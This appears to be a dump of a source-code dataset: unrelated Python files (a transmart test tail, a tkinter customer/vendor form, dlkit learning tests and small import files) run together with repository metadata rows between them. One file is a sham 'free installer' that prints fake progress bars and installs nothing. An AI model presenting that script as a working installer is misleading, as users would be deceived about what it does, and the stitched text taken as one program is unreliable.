'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Age%20Of'
'%20Onset/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Age%20Of'
'%20Onset/uncertain;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Age%20Of'
'%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Diagnosed/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Diagnosed/uncertain;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Diagnosed/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Vocal%20Chord'
'%20Diagnosed/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Vocal%20Chord'
'%20Diagnosed/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Non%20Allergic'
'%20Rhinitis%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Non%20Allergic'
'%20Rhinitis%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Age%20Of%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery%20Age'
'%20Of%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Parental%20Hay%20Fever/abnormal_non_clinically_'
'significant;'
'/studies/UBIOPRED/concepts/Subject%20History/Parental%20Hay%20Fever/normal')
inputs = {
'exps': '/studies/UBIOPRED/concepts/Expression/Affymetrix'
'%20Human%20Genome%20U133%20Plus%202.0%20Array/Lung',
'ann': ann,
'token': '7b8b0ce3-a2d3-47ca-bc04-2cf4672f44ac'
}
annotation = self.run_process('transmart-expressions', inputs)
self.assertFields(annotation, 'expset_type', 'Log2')
self.assertFileExists(annotation, 'expset')
| 73.03125 | 119 | 0.680188 | 1,088 | 11,685 | 7.272978 | 0.144301 | 0.142171 | 0.217996 | 0.254012 | 0.908126 | 0.908126 | 0.893466 | 0.893466 | 0.823708 | 0.814988 | 0 | 0.105842 | 0.198716 | 11,685 | 159 | 120 | 73.490566 | 0.739293 | 0.006932 | 0 | 0.470199 | 0 | 0.417219 | 0.7375 | 0.682759 | 0 | 0 | 0 | 0 | 0.02649 | 1 | 0.013245 | false | 0 | 0.02649 | 0 | 0.046358 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
5986b92379f9c76cb26771b4649102f96388cbcb | 132 | py | Python | gquant/dataframe_flow/__init__.py | raydouglass/gQuant | f117268c3480a820ac8a93d90980192cec014883 | [
"Apache-2.0"
] | null | null | null | gquant/dataframe_flow/__init__.py | raydouglass/gQuant | f117268c3480a820ac8a93d90980192cec014883 | [
"Apache-2.0"
] | null | null | null | gquant/dataframe_flow/__init__.py | raydouglass/gQuant | f117268c3480a820ac8a93d90980192cec014883 | [
"Apache-2.0"
] | null | null | null | from .node import * # noqa: F401,F403
from .taskSpecSchema import * # noqa: F401,F403
from .taskGraph import * # noqa: F401,F403
| 33 | 48 | 0.704545 | 18 | 132 | 5.166667 | 0.444444 | 0.322581 | 0.451613 | 0.580645 | 0.473118 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0.181818 | 132 | 3 | 49 | 44 | 0.694444 | 0.356061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
abaf6857edbedb6177e6324f37c0c51d4c47c36c | 110 | py | Python | msr/data/datasets/__init__.py | real-tesco/Multi-Step-Reasoning | 12c57714c490c5ef5aea9ecabce2143ca89d90b2 | [
"Apache-2.0"
] | null | null | null | msr/data/datasets/__init__.py | real-tesco/Multi-Step-Reasoning | 12c57714c490c5ef5aea9ecabce2143ca89d90b2 | [
"Apache-2.0"
] | null | null | null | msr/data/datasets/__init__.py | real-tesco/Multi-Step-Reasoning | 12c57714c490c5ef5aea9ecabce2143ca89d90b2 | [
"Apache-2.0"
] | null | null | null | from msr.data.datasets.bertdataset import BertDataset
from msr.data.datasets.indexdataset import IndexDataset
| 36.666667 | 55 | 0.872727 | 14 | 110 | 6.857143 | 0.5 | 0.145833 | 0.229167 | 0.395833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072727 | 110 | 2 | 56 | 55 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
abec301c11ff9fc8003fee9c7eb0c9b923d1c05d | 15,078 | py | Python | contact_form.py | chucktilbury/Accounting-TK | d0206f07d44e27eb08ecc5c59442604e0bddc3a3 | [
"MIT"
] | null | null | null | contact_form.py | chucktilbury/Accounting-TK | d0206f07d44e27eb08ecc5c59442604e0bddc3a3 | [
"MIT"
] | null | null | null | contact_form.py | chucktilbury/Accounting-TK | d0206f07d44e27eb08ecc5c59442604e0bddc3a3 | [
"MIT"
] | null | null | null | from tkinter import ttk
from tkinter import messagebox as mb
import tkinter as tk
from utility import Logger, debugger
from database import Database
from setup_form import SetupFormBase
from form_widgets import *
from notebk import NoteBk
from importer import Importer
#from import_form import ImportForm
# CREATE TABLE Customer
# (ID INTEGER PRIMARY KEY AUTOINCREMENT,
# date_created TEXT NOT NULL,
# name TEXT NOT NULL,
# address1 TEXT NOT NULL,
# address2 TEXT,
# state TEXT NOT NULL,
# city TEXT NOT NULL,
# zip TEXT NOT NULL,
# email_address TEXT,
# email_status_ID INTEGER,
# phone_number TEXT,
# phone_status_ID INTEGER,
# web_site TEXT,
# description TEXT,
# notes TEXT,
# country_ID INTEGER NOT NULL,
# type_ID INTEGER NOT NULL,
# status_ID INTEGER NOT NULL,
# class_ID INTEGER NOT NULL,
# locked_ID INTEGER NOT NULL);
class CustomerForm(SetupFormBase):
'''
Implement the customer form.
'''
def __init__(self, master, importing=False):
super().__init__(master, 'Customer')
self.form_contents = []
master.grid(padx=10, pady=10)
self.importer = Importer()
row = 0
col = 0
width = 50
header = Header(master, "Setup Customers")
header.grid(row=row, column=col, columnspan=4)
row+=1
col=0
tk.Label(master, text='Name:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.name = EntryBox(master, self.table, 'name', width=width)
self.name.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(self.name.get_line())
row+=1
col=0
tk.Label(master, text='Address1:').grid(row=row, column=col, sticky=(tk.E))
col+=1
address1 = EntryBox(master, self.table, 'address1', width=width)
address1.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(address1.get_line())
row+=1
col=0
tk.Label(master, text='Address2:').grid(row=row, column=col, sticky=(tk.E))
col+=1
address2 = EntryBox(master, self.table, 'address2', width=width)
address2.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(address2.get_line())
row+=1
col=0
tk.Label(master, text='City:').grid(row=row, column=col, sticky=(tk.E))
col+=1
city = EntryBox(master, self.table, 'city')
city.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(city.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='State:').grid(row=row, column=col, sticky=(tk.E))
col+=1
state = EntryBox(master, self.table, 'state')
state.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(state.get_line())
row+=1
col=0
tk.Label(master, text='Zip Code:').grid(row=row, column=col, sticky=(tk.E))
col+=1
zip = EntryBox(master, self.table, 'zip')
zip.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(zip.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Country:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.country_ID = ComboBox(master, self.table, 'country_ID')
self.country_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.country_ID.get_line())
row+=1
col=0
tk.Label(master, text='Email:').grid(row=row, column=col, sticky=(tk.E))
col+=1
email_address = EntryBox(master, self.table, 'email_address')
email_address.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(email_address.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Email Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.email_status_ID = ComboBox(master, self.table, 'email_status_ID')
self.email_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.email_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Phone:').grid(row=row, column=col, sticky=(tk.E))
col+=1
phone_number = EntryBox(master, self.table, 'phone_number')
phone_number.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(phone_number.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Phone Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.phone_status_ID = ComboBox(master, self.table, 'phone_status_ID')
self.phone_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.phone_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Web Site:').grid(row=row, column=col, sticky=(tk.E))
col+=1
web_site = EntryBox(master, self.table, 'web_site')
web_site.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(web_site.get_line())
#row+=1
#col=0
col += 1
tk.Label(master, text='Class:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.class_ID = ComboBox(master, self.table, 'class_ID')
self.class_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.class_ID.get_line())
row+=1
col=0
tk.Label(master, text='Description:').grid(row=row, column=col, sticky=(tk.E))
col+=1
description = EntryBox(master, self.table, 'description', width=width)
description.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(description.get_line())
row+=1
col=0
tk.Label(master, text='Notes:').grid(row=row, column=0, sticky=(tk.E))
col+=1
notes = NotesBox(master, self.table, 'notes', height=15)
notes.grid(row=row, column=col, columnspan=3, sticky=(tk.W))
self.form_contents.append(notes.get_line())
row+=1
col=0
buttons = ButtonBox(master, 'customer_form')
buttons.grid(row=row, column=col, columnspan=4)
buttons.register_events(
self.next_btn_command,
self.prev_btn_command,
self.select_button_command,
self.new_button_command,
self.save_button_command,
self.del_button_command
)
self.row = row
self.notebook_callback()
def notebook_callback(self):
self.class_ID.populate('ContactClass', 'name')
self.phone_status_ID.populate('PhoneStatus', 'name')
self.email_status_ID.populate('EmailStatus', 'name')
self.country_ID.populate('Country', 'name')
self.set_form()
@debugger
def del_button_command(self):
'''
Delete the item given in the form from the database.
This is an override to the parent class.
'''
row = self.data.get_row_list('SaleRecord', 'committed_ID = 1 and customer_ID = %d'%(self.id_list[self.crnt_index]))
if not row is None:
mb.showerror("ERROR", "Cannot delete the record because there are transactions committed for this customer.")
return
row = self.data.get_row_list('SaleRecord', 'committed_ID = 2 and customer_ID = %d'%(self.id_list[self.crnt_index]))
#print('\n\n%s\n\n'%(str(row)))
if not row is None:
val = mb.askokcancel("Sure?", "There are %d uncommitted sales for this Customer. They will be deleted as well.\n\nContinue?"%(len(row)))
if val:
count = 0
for item in row:
self.data.delete_row('SaleRecord', item['ID'])
count += 1
mb.showinfo('INFO', 'There were %d Sale Records deleted.'%(count))
else:
return
val = mb.askokcancel("Sure?", "Are you sure you want to delete item from %s?"%(self.table))
if val:
self.logger.info("Deleting item %d from %s"%(self.id_list[self.crnt_index], self.table))
self.data.delete_row(self.table, self.id_list[self.crnt_index])
self.data.commit()
self.id_list = self.get_id_list()
if self.crnt_index >= len(self.id_list):
self.crnt_index -= 1
self.set_form()
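The committed-transaction guard in `del_button_command` can be illustrated with a self-contained sqlite3 sketch. The schema mirrors the table comments in this file; `delete_customer` is a hypothetical helper, not part of this codebase:

```python
import sqlite3

# Sketch of the deletion guard: refuse to delete a Customer while committed
# SaleRecord rows (committed_ID = 1) reference it, and cascade-delete
# uncommitted ones (committed_ID = 2) otherwise.
con = sqlite3.connect(':memory:')
con.executescript('''
CREATE TABLE Customer (ID INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE SaleRecord (ID INTEGER PRIMARY KEY,
                         customer_ID INTEGER, committed_ID INTEGER);
INSERT INTO Customer (ID, name) VALUES (1, 'Acme');
INSERT INTO SaleRecord (customer_ID, committed_ID) VALUES (1, 1);
''')

def delete_customer(con, cust_id):
    committed = con.execute(
        'SELECT COUNT(*) FROM SaleRecord '
        'WHERE committed_ID = 1 AND customer_ID = ?', (cust_id,)).fetchone()[0]
    if committed:
        return False  # committed transactions exist; refuse to delete
    con.execute('DELETE FROM SaleRecord WHERE customer_ID = ?', (cust_id,))
    con.execute('DELETE FROM Customer WHERE ID = ?', (cust_id,))
    con.commit()
    return True

print(delete_customer(con, 1))  # refused while a committed sale exists
```

Once the sale is no longer committed (or is deleted), the same call succeeds and removes both the customer and any remaining uncommitted sale records.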
# CREATE TABLE Vendor
# (ID INTEGER PRIMARY KEY AUTOINCREMENT,
# date_created TEXT,
# name TEXT NOT NULL,
# description TEXT,
# notes TEXT,
# email_address TEXT,
# email_status_ID INTEGER,
# phone_number TEXT,
# phone_status_ID INTEGER,
# web_site TEXT);
class VendorForm(SetupFormBase):
'''
Implement the vendor form.
'''
def __init__(self, master, importing=False):
super().__init__(master, 'Vendor')
self.form_contents = []
master.grid(padx=10, pady=10)
self.importer = Importer()
row = 0
col = 0
width = 50
header = Header(master, "Setup Vendors")
header.grid(row=row, column=col, columnspan=4)
row+=1
col=0
tk.Label(master, text='Name:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.name = EntryBox(master, self.table, 'name', width=width)
self.name.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(self.name.get_line())
row+=1
col=0
tk.Label(master, text='Contact:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.contact_name = EntryBox(master, self.table, 'contact_name', width=width)
self.contact_name.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(self.name.get_line())
row+=1
col=0
tk.Label(master, text='Description:').grid(row=row, column=col, sticky=(tk.E))
col+=1
description = EntryBox(master, self.table, 'description', width=width)
description.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(description.get_line())
row+=1
col=0
tk.Label(master, text='Email:').grid(row=row, column=col, sticky=(tk.E))
col+=1
email_address = EntryBox(master, self.table, 'email_address')
email_address.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(email_address.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Email Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.email_status_ID = ComboBox(master, self.table, 'email_status_ID')
self.email_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.email_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Phone:').grid(row=row, column=col, sticky=(tk.E))
col+=1
phone_number = EntryBox(master, self.table, 'phone_number')
phone_number.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(phone_number.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Phone Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.phone_status_ID = ComboBox(master, self.table, 'phone_status_ID')
self.phone_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.phone_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Web Site:').grid(row=row, column=col, sticky=(tk.E))
col+=1
web_site = EntryBox(master, self.table, 'web_site', width=width)
web_site.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(web_site.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Vendor Type:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.type_ID = ComboBox(master, self.table, 'type_ID')
self.type_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.type_ID.get_line())
row+=1
col=0
tk.Label(master, text='Notes:').grid(row=row, column=col, sticky=(tk.E))
col+=1
notes = NotesBox(master, self.table, 'notes')
notes.grid(row=row, column=col, columnspan=3, sticky=(tk.W))
self.form_contents.append(notes.get_line())
row+=1
col=0
buttons = ButtonBox(master, 'vendor_form')
buttons.grid(row=row, column=col, columnspan=4)
buttons.register_events(
self.next_btn_command,
self.prev_btn_command,
self.select_button_command,
self.new_button_command,
self.save_button_command,
self.del_button_command
)
self.row = row
self.notebook_callback()
@debugger
def notebook_callback(self):
self.email_status_ID.populate('EmailStatus', 'name')
self.type_ID.populate('VendorType', 'name')
self.phone_status_ID.populate('PhoneStatus', 'name')
self.set_form()
@debugger
def del_button_command(self):
'''
Delete the item given in the form from the database.
This is an override to the parent class.
'''
row = self.data.get_row_list('PurchaseRecord', 'committed_ID = 1 and vendor_ID = %d'%(self.id_list[self.crnt_index]))
if row is not None:
mb.showerror("ERROR", "Cannot delete the record because there are transactions committed for this vendor.")
return
row = self.data.get_row_list('PurchaseRecord', 'committed_ID = 2 and vendor_ID = %d'%(self.id_list[self.crnt_index]))
self.logger.debug(str(row))
if row is not None:
val = mb.askokcancel("Sure?", "There are %d uncommitted purchases for this vendor. They will be deleted as well.\n\nContinue?"%(len(row)))
if val:
count = 0
for item in row:
# delete each uncommitted purchase record, not just the first one
self.data.delete_row('PurchaseRecord', item['ID'])
count += 1
mb.showinfo('INFO', 'There were %d Purchase Records deleted.'%(count))
else:
return
val = mb.askokcancel("Sure?", "Are you sure you want to delete item from %s?"%(self.table))
if val:
self.logger.info("Deleting item %d from %s"%(self.id_list[self.crnt_index], self.table))
self.data.delete_row(self.table, self.id_list[self.crnt_index])
self.data.commit()
self.id_list = self.get_id_list()
if self.crnt_index >= len(self.id_list):
self.crnt_index -= 1
self.set_form()
# cog/services/registration/__init__.py (downiec/COG, BSD-3-Clause)
from registration import RegistrationService
from registration_impl import ESGFRegistrationServiceImpl, esgfRegistrationServiceImpl
# ShtAPI_v1.4_free_installer.py (Shtuks/Puk, Unlicense)
# Forge installer
print("Forge v1.4 installer pirate")
input("Press Enter to start\n")
print("Installing...")
# fake download progress animation (the same three lines, printed 12 times)
for _ in range(12):
    print("| (0/0MB)")
    print("|| (0/0MB)")
    print("||| (0/0MB)")
print("PUK")  # "ПУК" in the original, matching the repo name
# Exit the program
input("\nPress Enter to exit.")
# tests/learning/test_sessions.py (UOC/dlkit, MIT)
"""Unit tests of learning sessions."""
import datetime
import pytest
from ..utilities.general import is_never_authz, is_no_authz, uses_cataloging, uses_filesystem_only
from dlkit.abstract_osid.hierarchy.objects import Hierarchy
from dlkit.abstract_osid.id.objects import IdList
from dlkit.abstract_osid.learning import objects as ABCObjects
from dlkit.abstract_osid.learning import queries as ABCQueries
from dlkit.abstract_osid.learning.objects import ObjectiveBank as ABCObjectiveBank
from dlkit.abstract_osid.learning.objects import ObjectiveList
from dlkit.abstract_osid.osid import errors
from dlkit.abstract_osid.osid.objects import OsidCatalogForm, OsidCatalog
from dlkit.abstract_osid.osid.objects import OsidForm
from dlkit.abstract_osid.osid.objects import OsidList
from dlkit.abstract_osid.osid.objects import OsidNode
from dlkit.json_.id.objects import IdList
from dlkit.primordium.calendaring.primitives import DateTime
from dlkit.primordium.id.primitives import Id
from dlkit.primordium.type.primitives import Type
from dlkit.runtime import PROXY_SESSION, proxy_example
from dlkit.runtime.managers import Runtime
REQUEST = proxy_example.SimpleRequest()
CONDITION = PROXY_SESSION.get_proxy_condition()
CONDITION.set_http_request(REQUEST)
PROXY = PROXY_SESSION.get_proxy(CONDITION)
DEFAULT_TYPE = Type(**{'identifier': 'DEFAULT', 'namespace': 'DEFAULT', 'authority': 'DEFAULT'})
DEFAULT_GENUS_TYPE = Type(**{'identifier': 'DEFAULT', 'namespace': 'GenusType', 'authority': 'DLKIT.MIT.EDU'})
ALIAS_ID = Id(**{'identifier': 'ALIAS', 'namespace': 'ALIAS', 'authority': 'ALIAS'})
NEW_TYPE = Type(**{'identifier': 'NEW', 'namespace': 'MINE', 'authority': 'YOURS'})
NEW_TYPE_2 = Type(**{'identifier': 'NEW 2', 'namespace': 'MINE', 'authority': 'YOURS'})
AGENT_ID = Id(**{'identifier': 'jane_doe', 'namespace': 'osid.agent.Agent', 'authority': 'MIT-ODL'})
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_lookup_session_class_fixture(request):
# Implemented from init template for ResourceLookupSession
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3A000000000000000000000000%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def objective_lookup_session_test_fixture(request):
request.cls.objective_list = list()
request.cls.objective_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveLookupSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveLookupSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_lookup_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(test_tear_down)
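The fixtures in this module all register teardown via pytest's `request.addfinalizer`. A minimal standalone sketch of that idiom, using a stub request object so it runs without pytest (`FakeRequest` is an illustration, not part of pytest's API):

```python
# Sketch of the addfinalizer teardown idiom used by the fixtures above.
# FakeRequest stands in for the pytest `request` fixture object.
class FakeRequest:
    def __init__(self):
        self._finalizers = []

    def addfinalizer(self, fn):
        self._finalizers.append(fn)

    def finish(self):
        # pytest runs finalizers in reverse registration order
        while self._finalizers:
            self._finalizers.pop()()

events = []

def my_fixture(request):
    events.append('setup')

    def tear_down():
        events.append('teardown')

    request.addfinalizer(tear_down)

req = FakeRequest()
my_fixture(req)   # setup runs, teardown is registered
req.finish()      # teardown runs after the "test"
```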
@pytest.mark.usefixtures("objective_lookup_session_class_fixture", "objective_lookup_session_test_fixture")
class TestObjectiveLookupSession(object):
"""Tests for ObjectiveLookupSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_objectives(self):
"""Tests can_lookup_objectives"""
# From test_templates/resource.py ResourceLookupSession.can_lookup_resources_template
assert isinstance(self.catalog.can_lookup_objectives(), bool)
def test_use_comparative_objective_view(self):
"""Tests use_comparative_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_objective_view()
def test_use_plenary_objective_view(self):
"""Tests use_plenary_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_objective_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_objective(self):
"""Tests get_objective"""
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_objective(self.objective_list[0].ident)
assert obj.ident == self.objective_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_objective(self.objective_list[0].ident)
assert obj.ident == self.objective_list[0].ident
else:
with pytest.raises(errors.NotFound):
self.catalog.get_objective(self.fake_id)
def test_get_objectives_by_ids(self):
"""Tests get_objectives_by_ids"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives_by_ids(self.objective_ids)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_ids(self.objective_ids)
assert isinstance(objects, ObjectiveList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
def test_get_objectives_by_genus_type(self):
"""Tests get_objectives_by_genus_type"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ObjectiveList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
def test_get_objectives_by_parent_genus_type(self):
"""Tests get_objectives_by_parent_genus_type"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
if not is_never_authz(self.service_config):
objects = self.catalog.get_objectives_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ObjectiveList)
else:
with pytest.raises(errors.Unimplemented):
# because the never_authz "tries harder" and runs the actual query...
# whereas above the method itself in JSON returns an empty list
self.catalog.get_objectives_by_parent_genus_type(DEFAULT_GENUS_TYPE)
def test_get_objectives_by_record_type(self):
"""Tests get_objectives_by_record_type"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ObjectiveList)
def test_get_objectives(self):
"""Tests get_objectives"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives()
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives()
assert isinstance(objects, ObjectiveList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
def test_get_objective_with_alias(self):
if not is_never_authz(self.service_config):
self.catalog.alias_objective(self.objective_ids[0], ALIAS_ID)
obj = self.catalog.get_objective(ALIAS_ID)
assert obj.get_id() == self.objective_ids[0]
class FakeQuery:
_cat_id_args_list = []
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_query_session_class_fixture(request):
# From test_templates/resource.py::ResourceQuerySession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
@pytest.fixture(scope="function")
def objective_query_session_test_fixture(request):
# From test_templates/resource.py::ResourceQuerySession::init_template
request.cls.objective_list = list()
request.cls.objective_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveQuerySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + color
create_form.description = (
'Test Objective for ObjectiveQuerySession tests, did I mention green')
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_query_session(proxy=PROXY)
request.cls.session = request.cls.catalog
